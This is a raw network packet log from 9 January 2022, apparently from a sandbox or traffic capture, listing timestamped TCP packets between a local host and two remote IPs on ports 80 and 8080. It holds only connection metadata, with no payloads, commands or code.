Jan 9, 2022 18:47:59.421217918 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421245098 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421284914 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421298027 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421322107 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421361923 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421375990 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421402931 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421441078 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421457052 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421479940 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421518087 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421534061 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421556950 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421597958 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421611071 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.425254107 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.425311089 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.425331116 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.425352097 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.425390959 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.425415039 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.466768026 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.514014006 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.514077902 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.514144897 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.572350979 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572412968 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572455883 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572479963 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.572494984 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572541952 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572566032 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.572583914 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572621107 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572633982 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.572660923 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572700977 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572715044 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.572741032 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572782993 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572791100 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.572823048 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572871923 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.572910070 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572952032 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.572992086 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573007107 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573029041 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573070049 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573082924 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573108912 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573146105 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573162079 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573185921 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573225021 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573239088 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573266029 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573303938 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573319912 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573343039 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573381901 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573398113 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573429108 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573467970 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573481083 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573507071 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573546886 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573565960 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.573585987 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573626995 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.573647976 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.581120014 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.581182003 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.581212044 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.581212997 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.581281900 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.581322908 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.753307104 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:01.644262075 CET	49803	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:01.824316025 CET	80	49803	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:01.824551105 CET	49803	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:01.824717045 CET	49803	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:01.824743032 CET	49803	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:02.004606962 CET	80	49803	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:02.384161949 CET	80	49803	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:02.384192944 CET	80	49803	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:02.384278059 CET	49803	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:02.393141985 CET	49803	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:02.420412064 CET	49804	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:02.573126078 CET	80	49803	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:02.595679998 CET	80	49804	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:02.595783949 CET	49804	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:02.595892906 CET	49804	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:02.597603083 CET	49804	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:02.771131039 CET	80	49804	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:02.772775888 CET	80	49804	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:03.146706104 CET	80	49804	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:03.146739006 CET	80	49804	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:03.146840096 CET	49804	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.181431055 CET	49804	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.217277050 CET	49805	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.356920958 CET	80	49804	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:03.391938925 CET	80	49805	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:03.392092943 CET	49805	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.392236948 CET	49805	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.392265081 CET	49805	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.566757917 CET	80	49805	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:03.950653076 CET	80	49805	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:03.950903893 CET	49805	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.950957060 CET	49805	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:03.978604078 CET	49806	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:04.125449896 CET	80	49805	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:04.151565075 CET	80	49806	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:04.151709080 CET	49806	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:04.151978016 CET	49806	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:04.152024031 CET	49806	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:04.325196981 CET	80	49806	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:04.704345942 CET	80	49806	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:04.704397917 CET	80	49806	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:04.704546928 CET	49806	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:04.704647064 CET	49806	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:04.710926056 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.773183107 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.773283005 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.773427010 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.835706949 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837193012 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837248087 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837285995 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837304115 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.837325096 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837364912 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837403059 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837403059 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.837443113 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837480068 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837481022 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.837519884 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837534904 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.837560892 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.837610960 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.878097057 CET	80	49806	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:04.900053978 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900110960 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900149107 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900182962 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900187969 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900228024 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900264025 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900266886 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900307894 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900326014 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900346994 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900387049 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900393963 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900427103 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900463104 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900475979 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900502920 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900541067 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900548935 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900579929 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900619030 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900655985 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900680065 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900696993 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900698900 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900737047 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900785923 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.900948048 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.900989056 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.901041985 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.962769985 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.962822914 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.962861061 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.962903976 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.962943077 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.962979078 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.962984085 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.963002920 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.963020086 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963049889 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.963058949 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963097095 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963119030 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.963135004 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963172913 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963190079 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.963213921 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963253975 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963269949 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.963291883 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963332891 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.963342905 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.963948011 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.964008093 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.964668036 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965006113 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965068102 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965229034 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965270996 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965327024 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965421915 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965461969 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965501070 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965531111 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965539932 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965579033 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965609074 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965617895 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965656042 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965662003 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965694904 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965734005 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965769053 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965775013 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965817928 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965825081 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965856075 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965897083 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965899944 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.965936899 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.965985060 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.966053009 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.966094017 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.966150999 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.966183901 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.966222048 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.966267109 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:04.966463089 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.966571093 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:04.966622114 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026143074 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026204109 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026246071 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026285887 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026287079 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026324034 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026355028 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026365042 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026402950 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026428938 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026443958 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026484966 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026508093 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026524067 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026562929 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026568890 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026602983 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026639938 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026653051 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026681900 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026720047 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026732922 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026768923 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026814938 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026822090 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026854038 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026895046 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026902914 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.026937008 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026973963 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.026988029 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.027013063 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.027050972 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.027060032 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.027230978 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.027298927 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.028274059 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.028316975 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.028357029 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.028389931 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.028393984 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.028469086 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.028978109 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029020071 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029057980 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029086113 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.029098034 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029149055 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.029659033 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029697895 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029736996 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029769897 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.029776096 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029815912 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029843092 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.029855013 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029895067 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029907942 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.029933929 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029974937 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.029984951 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.030011892 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.030066967 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.030262947 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.030302048 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.030378103 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.030416012 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.030455112 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.030493975 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.030508041 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.030531883 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.030580997 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089075089 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089124918 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089164972 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089204073 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089241982 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089278936 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089302063 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089319944 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089359999 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089397907 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089437962 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089452028 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089476109 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089515924 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089530945 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089554071 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089593887 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089606047 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089633942 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089673042 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089711905 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089735985 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089745045 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089751959 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089792013 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089798927 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089831114 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089868069 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089881897 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.089910030 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089950085 CET	8080	49807	185.7.214.171	192.168.2.3
